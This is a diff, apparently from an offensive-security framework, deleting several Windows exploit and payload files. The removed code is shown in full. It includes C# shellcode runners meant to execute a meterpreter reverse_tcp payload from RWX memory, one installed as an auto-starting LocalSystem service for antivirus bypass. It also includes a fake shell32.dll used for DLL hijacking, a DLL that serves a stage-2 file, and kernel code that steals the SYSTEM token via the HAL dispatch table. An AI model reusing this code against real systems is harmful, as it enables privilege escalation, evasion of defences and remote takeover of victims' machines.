-		len = recv(peerSk, buffer, sizeof(buffer), 0);
-		if (len <= 0)
-			goto closepeer;
-
-		hFile = CreateFile(stage2file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-		if (hFile == INVALID_HANDLE_VALUE)
-			break;
-
-		totalSize = GetFileSize(hFile, NULL);
-		if (totalSize == INVALID_FILE_SIZE)
-			break;
-
-		len = _snprintf(buffer, sizeof(buffer), 
-			"HTTP/1.1 200 OK\r\n"
-			"Content-Type: text/html\r\n"
-			"Connection: Close\r\n"
-			"Content-Length: %d\r\n"
-			"\r\n",
-			totalSize
-		);
-		send_all(peerSk, buffer, len);
-
-		while (totalSize > 0) {
-			ReadFile(hFile, buffer, sizeof(buffer), (DWORD*) &len, NULL);
-			send_all(peerSk, buffer, len);
-			totalSize -= len;
-		}
-		CloseHandle(hFile);
-		hFile = INVALID_HANDLE_VALUE;
-
-closepeer:
-		closesocket(peerSk);
-		peerSk = INVALID_SOCKET;
-	}
-
-	if (hFile != INVALID_HANDLE_VALUE) {
-		CloseHandle(hFile);
-	}
-	if (peerSk != INVALID_SOCKET) {
-		closesocket(peerSk);
-		peerSk = INVALID_SOCKET;
-	}
-	if (serverSk != INVALID_SOCKET) {
-		closesocket(serverSk);
-		serverSk = INVALID_SOCKET;
-	}
-
-	return 0;
-}
-
-DWORD WINAPI threadProc(void *param)
-{
-	WSADATA wsaData;
-	WSAStartup(MAKEWORD(2 ,2), &wsaData);
-
-	local_server();
-
-	WSACleanup();
-
-	DeleteFile(stage2file);
-	return 0;
-}
-
-void do_work()
-{
-	GetEnvironmentVariableW(L"stage2file", stage2file, sizeof(stage2file));
-
-	hThread = CreateThread(NULL, 0, threadProc, NULL, 0, NULL);
-}
-
-BOOL APIENTRY DllMain( HMODULE hModule,
-                       DWORD  ul_reason_for_call,
-                       LPVOID lpReserved
-					 )
-{
-	switch (ul_reason_for_call)
-	{
-	case DLL_PROCESS_ATTACH:
-		do_work();
-		break;
-	case DLL_PROCESS_DETACH:
-		if (hThread) {
-			WaitForSingleObject(hThread, INFINITE);
-			CloseHandle(hThread);
-		}
-		break;
-	}
-	return TRUE;
-}
@@ -1,39 +0,0 @@
-/*
-From: https://gist.github.com/worawit/1213febe36aa8331e092
-
-Fake shell32.dll to be loaded after modified %SystemRoot%
-*/
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-static void do_work()
-{
-	WCHAR envBuffer[256];
-
-	GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
-	// restore system root
-	SetEnvironmentVariableW(L"SystemRoot", envBuffer);
-	//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
-
-	GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
-	SetEnvironmentVariableW(L"MyDllPath", NULL);
-
-	// shell32.dll will be unloaded, use another dll
-	LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
-}
-
-BOOL APIENTRY DllMain( HMODULE hModule,
-                       DWORD  ul_reason_for_call,
-                       LPVOID lpReserved
-					 )
-{
-	switch (ul_reason_for_call)
-	{
-	case DLL_PROCESS_ATTACH:
-		do_work();
-		break;
-	case DLL_PROCESS_DETACH:
-		break;
-	}
-	return TRUE;
-}
@@ -92,13 +92,6 @@ IF "%ERRORLEVEL%"=="0" (
  POPD
 )

-IF "%ERRORLEVEL%"=="0" (
-  ECHO "Building CAPCOM.SYS Driver exec"
-  PUSHD capcom_sys_exec
-  msbuild.exe make.msbuild /target:%PLAT%
-  POPD
-)
-
 FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
 SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
 echo Finished %ldt%
@@ -1,86 +0,0 @@
-using System;
-using System.Runtime.InteropServices;
-
-namespace Wrapper
-{
-    class Program
-    {
-        [Flags]
-        public enum AllocationType : uint
-        {
-            COMMIT = 0x1000,
-            RESERVE = 0x2000,
-            RESET = 0x80000,
-            LARGE_PAGES = 0x20000000,
-            PHYSICAL = 0x400000,
-            TOP_DOWN = 0x100000,
-            WRITE_WATCH = 0x200000
-        }
-
-        [Flags]
-        public enum MemoryProtection : uint
-        {
-            EXECUTE = 0x10,
-            EXECUTE_READ = 0x20,
-            EXECUTE_READWRITE = 0x40,
-            EXECUTE_WRITECOPY = 0x80,
-            NOACCESS = 0x01,
-            READONLY = 0x02,
-            READWRITE = 0x04,
-            WRITECOPY = 0x08,
-            GUARD_Modifierflag = 0x100,
-            NOCACHE_Modifierflag = 0x200,
-            WRITECOMBINE_Modifierflag = 0x400
-        }
-
-        public enum FreeType : uint
-        {
-            MEM_DECOMMIT = 0x4000,
-            MEM_RELEASE = 0x8000
-        }
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
-
-        [DllImport("kernel32.dll")]
-        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
-        [DllImport("kernel32")]
-        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
-
-        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
-        public delegate Int32 ExecuteDelegate();
-
-        static void Main()
-        {
-            // msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<port> LHOST=<host> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-            string shellcode = "MSF_PAYLOAD_SPACE";
-
-
-            byte[] sc = new byte[shellcode.Length];
-
-            for (int i = 0; i < shellcode.Length; i++)
-            {
-                sc[i] = Convert.ToByte(shellcode[i]);
-            }
-
-            // Allocate RWX memory for the shellcode
-            IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
-
-            try
-            {
-                // Copy shellcode to RWX buffer
-                Marshal.Copy(sc, 0, baseAddr, sc.Length);
-
-                // Get pointer to function created in memory
-                ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
-
-                del();
-            }
-            finally
-            {
-                VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
-            }
-        }
-    }
-}
@@ -1,221 +0,0 @@
-
-using System;
-using System.ComponentModel;
-using System.Configuration.Install;
-using System.Net;
-using System.Net.Sockets;
-using System.Runtime.InteropServices;
-using System.ServiceProcess;
-using System.Threading;
-using System.Timers;
-using Timer = System.Timers.Timer;
-
-namespace Wrapper
-{
-    class Program : ServiceBase
-    {
-        #region Fields
-
-        private static Timer _timer; 
-
-        #endregion
-
-        #region PInvoke Setup
-
-        [Flags]
-        public enum AllocationType : uint
-        {
-            COMMIT = 0x1000,
-            RESERVE = 0x2000,
-            RESET = 0x80000,
-            LARGE_PAGES = 0x20000000,
-            PHYSICAL = 0x400000,
-            TOP_DOWN = 0x100000,
-            WRITE_WATCH = 0x200000
-        }
-
-        [Flags]
-        public enum MemoryProtection : uint
-        {
-            EXECUTE = 0x10,
-            EXECUTE_READ = 0x20,
-            EXECUTE_READWRITE = 0x40,
-            EXECUTE_WRITECOPY = 0x80,
-            NOACCESS = 0x01,
-            READONLY = 0x02,
-            READWRITE = 0x04,
-            WRITECOPY = 0x08,
-            GUARD_Modifierflag = 0x100,
-            NOCACHE_Modifierflag = 0x200,
-            WRITECOMBINE_Modifierflag = 0x400
-        }
-
-        public enum FreeType : uint
-        {
-            MEM_DECOMMIT = 0x4000,
-            MEM_RELEASE = 0x8000
-        }
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
-
-        [DllImport("kernel32.dll")]
-        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
-        [DllImport("kernel32")]
-        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
-
-        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
-        public delegate Int32 ExecuteDelegate(); 
-
-        #endregion
-
-        #region Constructors
-        
-        public Program()
-        {
-            ServiceName = "MsfDynSvc";
-            _timer = new Timer
-                         {
-                             Interval = 20000 // 20 seconds
-                         };
-            _timer.Elapsed += RunShellCode;
-            _timer.AutoReset = true;
-        }
-        
-        #endregion
-
-        #region ServiceBase Methods
-
-        protected override void OnStart(string[] args)
-        {
-            base.OnStart(args);
-            _timer.Start();
-        }
-
-        protected override void OnStop()
-        {
-            base.OnStop();
-            _timer.Stop();
-        }
-
-        #endregion
-
-        static void Main()
-        {
-            Run(new Program());
-        }
-
-        private void RunShellCode(object sender, ElapsedEventArgs e)
-        {
-            _timer.Stop();
-            
-            // only run shellcode if you can connect to localhost:445, due to endpoint protections
-            if (ConnectToLocalhost(445))
-            {
-                try
-                {
-                    // msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<port> LHOST=<host> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-                    string shellcode = "MSF_PAYLOAD_SPACE";
-
-                    byte[] sc = new byte[shellcode.Length];
-
-                    for (int i = 0; i < shellcode.Length; i++)
-                    {
-                        sc[i] = Convert.ToByte(shellcode[i]);
-                    }
-
-                    // Allocate RWX memory for the shellcode
-                    IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
-                    System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: Couldn't allocate remote memory");
-
-                    try
-                    {
-                        // Copy shellcode to RWX buffer
-                        Marshal.Copy(sc, 0, baseAddr, sc.Length);
-
-                        // Get pointer to function created in memory
-                        ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
-
-                        // Run this in a separate thread, so that we can wait for it to die before continuing the timer
-                        Thread thread = new Thread(() => del());
-
-                        thread.Start();
-                        thread.Join(); // Joins it to the main thread, so that when it ends, execution will continue with main thread
-                    }
-                    catch
-                    {
-                        // If the shellcode crashes, try to catch the crash here
-                    }
-                    finally
-                    {
-                        VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
-                    }
-                }
-                catch
-                {
-                    // Eat it
-                }
-            }
-            _timer.Start();
-        } 
-
-        private static bool ConnectToLocalhost(int port)
-        {
-            IPAddress localhost = IPAddress.Parse("127.0.0.1");
-            TcpClient tcpClient = new TcpClient();
-
-            bool isSuccess = false;
-            
-            try
-            {
-                tcpClient.Connect(localhost, port);
-                isSuccess = true;
-            }
-            catch
-            {
-                // I know this is bad code-fu, but just eat the error
-            }
-            finally
-            {
-                if (tcpClient.Connected)
-                {
-                    tcpClient.Close();    
-                }
-            }
-
-            return isSuccess;
-        }
-
-    }
-
-    [RunInstaller(true)]
-    public class DotNetAVBypassServiceInstaller : Installer
-    {
-        public DotNetAVBypassServiceInstaller()
-        {
-            var processInstaller = new ServiceProcessInstaller();
-            var serviceInstaller = new ServiceInstaller();
-
-            //set the privileges
-            processInstaller.Account = ServiceAccount.LocalSystem;
-
-            serviceInstaller.DisplayName = "MsfDynSvc";
-            serviceInstaller.StartType = ServiceStartMode.Automatic;
-
-            //must be the same as what was set in Program's constructor
-            serviceInstaller.ServiceName = "MsfDynSvc";
-
-            Installers.Add(processInstaller);
-            Installers.Add(serviceInstaller);
-        }
-
-        public override void Install(System.Collections.IDictionary stateSaver)
-        {
-            base.Install(stateSaver);
-            ServiceController controller = new ServiceController("MsfDynSvc"); // Make sure this name matches the service name!
-            controller.Start();
-        }
-    }
-}
-
@@ -1,36 +0,0 @@
-using System;
-using System.Reflection;
-
-namespace Shellcode
-{
-	class MainClass
-	{
-	public delegate uint Ret1ArgDelegate(uint arg1);
-	    static uint PlaceHolder1(uint arg1) { return 0; }
-	        
-	    unsafe static void Main(string[] args)
-	    {
-	    	string shellcode = "MSF_PAYLOAD_SPACE";
-	    	byte[] asmBytes = new byte[shellcode.Length];
-			for (int i = 0; i < shellcode.Length; i++)
-			{
-			    asmBytes[i] = Convert.ToByte(shellcode[i]);
-			}
-	        fixed(byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
-	        {
-	            // Get the FieldInfo for "_methodPtr"
-	            Type delType = typeof(Delegate);
-	            FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic | BindingFlags.Instance);
-	
-	            // Set our delegate to our x86 code
-	            Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
-	            _methodPtr.SetValue(del, (IntPtr)startAddress);
-	
-	            // Enjoy
-	            uint n = (uint)0xdecafbad;
-	            n = del(n);
-	            Console.WriteLine("{0:x}", n);
-	        }
-	    }
-	}
-}
@@ -1,274 +0,0 @@
-#include <stdio.h>
-#include "windefs.h"
-#include "kernel.h"
-#include <Psapi.h>
-
-#define SYSTEM_PID 4
-#define DRIVER_COUNT 1024
-
-typedef NTSTATUS(NTAPI*PLOOKUPPROCESSBYID)(HANDLE processId, PVOID process);
-typedef PACCESS_TOKEN(NTAPI*PREFPRIMARYTOKEN)(PVOID process);
-typedef NTSTATUS(WINAPI*PNTQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS sysInfoClass, PVOID sysInfo, ULONG sysInfoLength, PULONG returnLength);
-typedef NTSTATUS(WINAPI*PNTQUERYINTERVALPROFILE)(DWORD profileSource, PULONG interval);
-
-static ULONG_PTR g_pHalDispatch = 0L;
-static PLOOKUPPROCESSBYID g_pLookupProcessById = NULL;
-static PREFPRIMARYTOKEN g_pRefPrimaryToken = NULL;
-static DWORD g_currentPid = 0;
-static DWORD g_replaced = FALSE;
-
-static NTSTATUS WINAPI NtQueryIntervalProfile(DWORD profileSource, PULONG interval)
-{
-	static PNTQUERYINTERVALPROFILE pNtQueryIntervalProfile = NULL;
-
-	if (pNtQueryIntervalProfile == NULL)
-	{
-		pNtQueryIntervalProfile = (PNTQUERYINTERVALPROFILE)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueryIntervalProfile");
-	}
-
-	return pNtQueryIntervalProfile(profileSource, interval);
-}
-
-static NTSTATUS WINAPI NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS sysInfoClass, PVOID sysInfo, ULONG sysInfoLength, PULONG returnLength)
-{
-	static PNTQUERYSYSTEMINFORMATION pNtQuerySystemInformation = NULL;
-
-	if (pNtQuerySystemInformation == NULL)
-	{
-		pNtQuerySystemInformation = (PNTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQuerySystemInformation");
-	}
-
-	return pNtQuerySystemInformation(sysInfoClass, sysInfo, sysInfoLength, returnLength);
-}
-
-static PVOID get_system_info(SYSTEM_INFORMATION_CLASS infoClass)
-{
-	ULONG size = 0x100;
-	const ULONG maxSize = size << 10;
-	PVOID buffer = NULL;
-	NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
-	ULONG memIO = 0;
-	
-	while (status == STATUS_INFO_LENGTH_MISMATCH && maxSize > size)
-	{
-		buffer = buffer == NULL ? HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size) : HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, buffer, size);
-		status = NtQuerySystemInformation(infoClass, buffer, size, &memIO);
-		size = size << 1;
-	}
-
-	if (NT_SUCCESS(status))
-	{
-		return buffer;
-	}
-
-	if (buffer != NULL)
-	{
-		HeapFree(GetProcessHeap(), 0, buffer);
-	}
-
-	return NULL;
-}
-
-static VOID find_and_replace_member(PDWORD_PTR pStruct, DWORD_PTR currentValue, DWORD_PTR newValue, DWORD_PTR maxSize)
-{
-	DWORD_PTR mask = ~(sizeof(DWORD_PTR) == sizeof(DWORD) ? 7 : 0xf);
-	g_replaced = FALSE;
-
-	for (DWORD_PTR i = 0; i < maxSize; ++i)
-	{
-		if (((pStruct[i] ^ currentValue) & mask) == 0)
-		{
-			pStruct[i] = newValue;
-			g_replaced = TRUE;
-			return;
-		}
-	}
-}
-
-BOOL is_driver_loaded(wchar_t* driverName)
-{
-	// start by finding out how big the buffer size needs to be:
-	LPVOID derp = 0;
-	DWORD sizeNeeded = 0;
-	BOOL result = FALSE;
-
-	// determine the size required first
-	EnumDeviceDrivers(&derp, sizeof(derp), &sizeNeeded);
-
-	LPVOID* driverList = (LPVOID*)malloc(sizeNeeded);
-
-	if (EnumDeviceDrivers(driverList, sizeNeeded, &sizeNeeded))
-	{
-		wchar_t driver[MAX_PATH];
-		DWORD driverCount = sizeNeeded / sizeof(LPVOID);
-
-		for (DWORD i = 0; i < driverCount; ++i)
-		{
-			if (GetDeviceDriverBaseNameW(driverList[i], driver, MAX_PATH)
-				&& _wcsicmp(driver, driverName) == 0)
-			{
-				result = TRUE;
-				break;
-			}
-		}
-	}
-
-	free(driverList);
-
-	return result;
-}
-
-// Simple wrapper over the steal_process_token that takes the four arguments used by the function we
-// overwrite in the HAL dispatch
-VOID hal_dispatch_steal_process_token(DWORD_PTR arg1, DWORD_PTR arg2, DWORD_PTR arg3, DWORD_PTR arg4)
-{
-	steal_process_token();
-}
-
-VOID steal_process_token()
-{
-	LPVOID currentProcessInfo = NULL;
-	LPVOID systemProcessInfo = NULL;
-
-	g_pLookupProcessById((HANDLE)g_currentPid, &currentProcessInfo);
-	g_pLookupProcessById((HANDLE)SYSTEM_PID, &systemProcessInfo);
-
-	PACCESS_TOKEN targetToken = g_pRefPrimaryToken(currentProcessInfo);
-	PACCESS_TOKEN systemToken = g_pRefPrimaryToken(systemProcessInfo);
-
-	find_and_replace_member((PDWORD_PTR)currentProcessInfo, (DWORD_PTR)targetToken, (DWORD_PTR)systemToken, 0x200);
-}
-
-BOOL prepare_for_kernel()
-{
-	BOOL result = FALSE;
-	PRTL_PROCESS_MODULES procModules = NULL;
-	CHAR fullKernelPath[MAX_PATH * 2 + 1] = { 0 };
-	PVOID mappedKernel = NULL;
-
-	do
-	{
-		procModules = get_system_info(SystemModuleInformation);
-		if (procModules == NULL || procModules->NumberOfModules == 0)
-		{
-			break;
-		}
-
-		UINT length = GetSystemDirectoryA(fullKernelPath, MAX_PATH);
-		fullKernelPath[length] = '\\';
-
-		const char* firstModule = (const char*)&procModules->Modules[0].FullPathName[procModules->Modules[0].OffsetToFileName];
-		strcat_s(fullKernelPath, MAX_PATH, firstModule);
-
-		ULONG_PTR kernelBase = (ULONG_PTR)procModules->Modules[0].ImageBase;
-		mappedKernel = LoadLibraryExA(fullKernelPath, NULL, DONT_RESOLVE_DLL_REFERENCES);
-		if (mappedKernel == NULL)
-		{
-			break;
-		}
-
-		ULONG_PTR funcAddr = (ULONG_PTR)GetProcAddress(mappedKernel, "PsLookupProcessByProcessId");
-
-		if (funcAddr == 0L)
-		{
-			break;
-		}
-
-		g_pLookupProcessById = (PLOOKUPPROCESSBYID)(kernelBase + funcAddr - (ULONG_PTR)mappedKernel);
-
-		funcAddr = (ULONG_PTR)GetProcAddress(mappedKernel, "PsReferencePrimaryToken");
-
-		if (funcAddr == 0L)
-		{
-			break;
-		}
-
-		g_pRefPrimaryToken = (PREFPRIMARYTOKEN)(kernelBase + funcAddr - (ULONG_PTR)mappedKernel);
-
-		funcAddr = (ULONG_PTR)GetProcAddress(mappedKernel, "HalDispatchTable");
-
-		if (funcAddr != 0L)
-		{
-			g_pHalDispatch = kernelBase + funcAddr - (ULONG_PTR)mappedKernel;
-		}
-
-		g_currentPid = GetCurrentProcessId();
-
-		result = TRUE;
-	} while (0);
-
-	if (mappedKernel != NULL)
-	{
-		FreeLibrary(mappedKernel);
-	}
-
-	if (procModules != NULL)
-	{
-		HeapFree(GetProcessHeap(), 0, procModules);
-	}
-
-	return result;
-}
-
-BOOL was_token_replaced()
-{
-	return g_replaced;
-}
-
-ULONG_PTR get_hal_dispatch_pointer()
-{
-	return g_pHalDispatch + sizeof(ULONG_PTR);
-}
-
-VOID invoke_hal_dispatch_pointer()
-{
-	ULONG ignored;
-	NtQueryIntervalProfile(1234, &ignored);
-}
-
-DWORD get_page_size()
-{
-	static DWORD pageSize = 0;
-	if (pageSize == 0)
-	{
-		SYSTEM_INFO si;
-		GetSystemInfo(&si);
-		pageSize = si.dwPageSize;
-	}
-	return pageSize;
-}
-
-BOOL create_anon_mapping(MemMapping* memMap)
-{
-	memMap->mapping = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, get_page_size(), NULL);
-	if (memMap->mapping == NULL)
-	{
-		return FALSE;
-	}
-
-	memMap->buffer = (LPBYTE)MapViewOfFile(memMap->mapping, FILE_MAP_ALL_ACCESS, 0, 0, get_page_size());
-	if (memMap->buffer == NULL)
-	{
-		destroy_anon_mapping(memMap);
-		return FALSE;
-	}
-
-	return TRUE;
-}
-
-VOID destroy_anon_mapping(MemMapping* memMap)
-{
-	if (memMap != NULL)
-	{
-		if (memMap->buffer)
-		{
-			UnmapViewOfFile(memMap->buffer);
-			memMap->buffer = NULL;
-		}
-		if (memMap->mapping != NULL)
-		{
-			CloseHandle(memMap->mapping);
-			memMap->mapping = NULL;
-		}
-	}
-}
@@ -1,23 +0,0 @@
-#ifndef _KERNEL_H
-#define _KERNEL_H
-
-#include "windefs.h"
-
-typedef struct _MemMapping
-{
-	HANDLE mapping;
-	LPBYTE buffer;
-} MemMapping;
-
-BOOL was_token_replaced();
-BOOL prepare_for_kernel();
-VOID steal_process_token();
-VOID hal_dispatch_steal_process_token();
-ULONG_PTR get_hal_dispatch_pointer();
-DWORD get_page_size();
-BOOL create_anon_mapping(MemMapping* memMap);
-VOID destroy_anon_mapping(MemMapping* memMap);
-VOID invoke_hal_dispatch_pointer();
-BOOL is_driver_loaded(wchar_t* driverName);
-
-#endif
@@ -1,199 +0,0 @@
-#ifndef _WINDEFS_H
-#define _WINDEFS_H
-
-// Hooray for windows API stuff being so shit including different files results in a mess
-#pragma warning(disable: 4005)  // Macro redefinition
-
-#include <Windows.h>
-#include <WinIoCtl.h>
-#include <ntstatus.h>
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
-#endif
-
-#ifndef SYSTEM_INFORMATION_CLASS
-typedef enum _SYSTEM_INFORMATION_CLASS
-{
-	SystemBasicInformation = 0,
-	SystemProcessorInformation = 1,
-	SystemPerformanceInformation = 2,
-	SystemTimeOfDayInformation = 3,
-	SystemPathInformation = 4,
-	SystemProcessInformation = 5,
-	SystemCallCountInformation = 6,
-	SystemDeviceInformation = 7,
-	SystemProcessorPerformanceInformation = 8,
-	SystemFlagsInformation = 9,
-	SystemCallTimeInformation = 10,
-	SystemModuleInformation = 11,
-	SystemLocksInformation = 12,
-	SystemStackTraceInformation = 13,
-	SystemPagedPoolInformation = 14,
-	SystemNonPagedPoolInformation = 15,
-	SystemHandleInformation = 16,
-	SystemObjectInformation = 17,
-	SystemPageFileInformation = 18,
-	SystemVdmInstemulInformation = 19,
-	SystemVdmBopInformation = 20,
-	SystemFileCacheInformation = 21,
-	SystemPoolTagInformation = 22,
-	SystemInterruptInformation = 23,
-	SystemDpcBehaviorInformation = 24,
-	SystemFullMemoryInformation = 25,
-	SystemLoadGdiDriverInformation = 26,
-	SystemUnloadGdiDriverInformation = 27,
-	SystemTimeAdjustmentInformation = 28,
-	SystemSummaryMemoryInformation = 29,
-	SystemMirrorMemoryInformation = 30,
-	SystemPerformanceTraceInformation = 31,
-	SystemObsolete0 = 32,
-	SystemExceptionInformation = 33,
-	SystemCrashDumpStateInformation = 34,
-	SystemKernelDebuggerInformation = 35,
-	SystemContextSwitchInformation = 36,
-	SystemRegistryQuotaInformation = 37,
-	SystemExtendServiceTableInformation = 38,
-	SystemPrioritySeperation = 39,
-	SystemVerifierAddDriverInformation = 40,
-	SystemVerifierRemoveDriverInformation = 41,
-	SystemProcessorIdleInformation = 42,
-	SystemLegacyDriverInformation = 43,
-	SystemCurrentTimeZoneInformation = 44,
-	SystemLookasideInformation = 45,
-	SystemTimeSlipNotification = 46,
-	SystemSessionCreate = 47,
-	SystemSessionDetach = 48,
-	SystemSessionInformation = 49,
-	SystemRangeStartInformation = 50,
-	SystemVerifierInformation = 51,
-	SystemVerifierThunkExtend = 52,
-	SystemSessionProcessInformation = 53,
-	SystemLoadGdiDriverInSystemSpace = 54,
-	SystemNumaProcessorMap = 55,
-	SystemPrefetcherInformation = 56,
-	SystemExtendedProcessInformation = 57,
-	SystemRecommendedSharedDataAlignment = 58,
-	SystemComPlusPackage = 59,
-	SystemNumaAvailableMemory = 60,
-	SystemProcessorPowerInformation = 61,
-	SystemEmulationBasicInformation = 62,
-	SystemEmulationProcessorInformation = 63,
-	SystemExtendedHandleInformation = 64,
-	SystemLostDelayedWriteInformation = 65,
-	SystemBigPoolInformation = 66,
-	SystemSessionPoolTagInformation = 67,
-	SystemSessionMappedViewInformation = 68,
-	SystemHotpatchInformation = 69,
-	SystemObjectSecurityMode = 70,
-	SystemWatchdogTimerHandler = 71,
-	SystemWatchdogTimerInformation = 72,
-	SystemLogicalProcessorInformation = 73,
-	SystemWow64SharedInformationObsolete = 74,
-	SystemRegisterFirmwareTableInformationHandler = 75,
-	SystemFirmwareTableInformation = 76,
-	SystemModuleInformationEx = 77,
-	SystemVerifierTriageInformation = 78,
-	SystemSuperfetchInformation = 79,
-	SystemMemoryListInformation = 80,
-	SystemFileCacheInformationEx = 81,
-	SystemThreadPriorityClientIdInformation = 82,
-	SystemProcessorIdleCycleTimeInformation = 83,
-	SystemVerifierCancellationInformation = 84,
-	SystemProcessorPowerInformationEx = 85,
-	SystemRefTraceInformation = 86,
-	SystemSpecialPoolInformation = 87,
-	SystemProcessIdInformation = 88,
-	SystemErrorPortInformation = 89,
-	SystemBootEnvironmentInformation = 90,
-	SystemHypervisorInformation = 91,
-	SystemVerifierInformationEx = 92,
-	SystemTimeZoneInformation = 93,
-	SystemImageFileExecutionOptionsInformation = 94,
-	SystemCoverageInformation = 95,
-	SystemPrefetchPatchInformation = 96,
-	SystemVerifierFaultsInformation = 97,
-	SystemSystemPartitionInformation = 98,
-	SystemSystemDiskInformation = 99,
-	SystemProcessorPerformanceDistribution = 100,
-	SystemNumaProximityNodeInformation = 101,
-	SystemDynamicTimeZoneInformation = 102,
-	SystemCodeIntegrityInformation = 103,
-	SystemProcessorMicrocodeUpdateInformation = 104,
-	SystemProcessorBrandString = 105,
-	SystemVirtualAddressInformation = 106,
-	SystemLogicalProcessorAndGroupInformation = 107,
-	SystemProcessorCycleTimeInformation = 108,
-	SystemStoreInformation = 109,
-	SystemRegistryAppendString = 110,
-	SystemAitSamplingValue = 111,
-	SystemVhdBootInformation = 112,
-	SystemCpuQuotaInformation = 113,
-	SystemNativeBasicInformation = 114,
-	SystemErrorPortTimeouts = 115,
-	SystemLowPriorityIoInformation = 116,
-	SystemBootEntropyInformation = 117,
-	SystemVerifierCountersInformation = 118,
-	SystemPagedPoolInformationEx = 119,
-	SystemSystemPtesInformationEx = 120,
-	SystemNodeDistanceInformation = 121,
-	SystemAcpiAuditInformation = 122,
-	SystemBasicPerformanceInformation = 123,
-	SystemQueryPerformanceCounterInformation = 124,
-	SystemSessionBigPoolInformation = 125,
-	SystemBootGraphicsInformation = 126,
-	SystemScrubPhysicalMemoryInformation = 127,
-	SystemBadPageInformation = 128,
-	SystemProcessorProfileControlArea = 129,
-	SystemCombinePhysicalMemoryInformation = 130,
-	SystemEntropyInterruptTimingInformation = 131,
-	SystemConsoleInformation = 132,
-	SystemPlatformBinaryInformation = 133,
-	SystemPolicyInformation = 134,
-	SystemHypervisorProcessorCountInformation = 135,
-	SystemDeviceDataInformation = 136,
-	SystemDeviceDataEnumerationInformation = 137,
-	SystemMemoryTopologyInformation = 138,
-	SystemMemoryChannelInformation = 139,
-	SystemBootLogoInformation = 140,
-	SystemProcessorPerformanceInformationEx = 141,
-	SystemSpare0 = 142,
-	SystemSecureBootPolicyInformation = 143,
-	SystemPageFileInformationEx = 144,
-	SystemSecureBootInformation = 145,
-	SystemEntropyInterruptTimingRawInformation = 146,
-	SystemPortableWorkspaceEfiLauncherInformation = 147,
-	SystemFullProcessInformation = 148,
-	SystemKernelDebuggerInformationEx = 149,
-	SystemBootMetadataInformation = 150,
-	SystemSoftRebootInformation = 151,
-	SystemElamCertificateInformation = 152,
-	SystemOfflineDumpConfigInformation = 153,
-	SystemProcessorFeaturesInformation = 154,
-	SystemRegistryReconciliationInformation = 155,
-	SystemEdidInformation = 156,
-	MaxSystemInfoClass = 157
-} SYSTEM_INFORMATION_CLASS;
-#endif
-
-typedef struct _RTL_PROCESS_MODULE_INFORMATION
-{
-	HANDLE Section;
-	PVOID MappedBase;
-	PVOID ImageBase;
-	ULONG ImageSize;
-	ULONG Flags;
-	USHORT LoadOrderIndex;
-	USHORT InitOrderIndex;
-	USHORT LoadCount;
-	USHORT OffsetToFileName;
-	UCHAR FullPathName[256];
-} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
-
-typedef struct _RTL_PROCESS_MODULES
-{
-	ULONG NumberOfModules;
-	RTL_PROCESS_MODULE_INFORMATION Modules[1];
